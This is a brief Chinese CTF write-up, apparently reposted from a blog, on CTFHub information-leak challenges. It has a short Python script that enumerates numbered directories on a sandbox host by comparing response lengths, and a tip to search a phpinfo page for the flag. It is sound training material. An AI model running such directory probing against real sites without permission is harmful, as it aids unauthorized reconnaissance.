CTF----信息泄露
作者:互联网
1.目录遍历
python 目录遍历.py
http://challenge-d404b87871299834.sandbox.ctfhub.com:10800/flag_in_here/4/1
import requests
url="http://challenge-d404b87871299834.sandbox.ctfhub.com:10800/flag_in_here"
url1="http://challenge-d404b87871299834.sandbox.ctfhub.com:10800/flag_in_here/1/1"
r1=requests.get(url1)
r1_len=len(r1.text)
for i in range(1,5):
for j in range(1,5):
url_test=url+"/"+str(i)+"/"+str(j)
r=requests.get(url_test)
get_file_len=len(r.text)
if r1_len != get_file_len:
print(url_test)
2.PHPINFO
Ctrl+f
ctf{
标签:r1,get,url,d404b87871299834,len,----,ctfhub,CTF,泄露 来源: https://www.cnblogs.com/TinKode123/p/16128845.html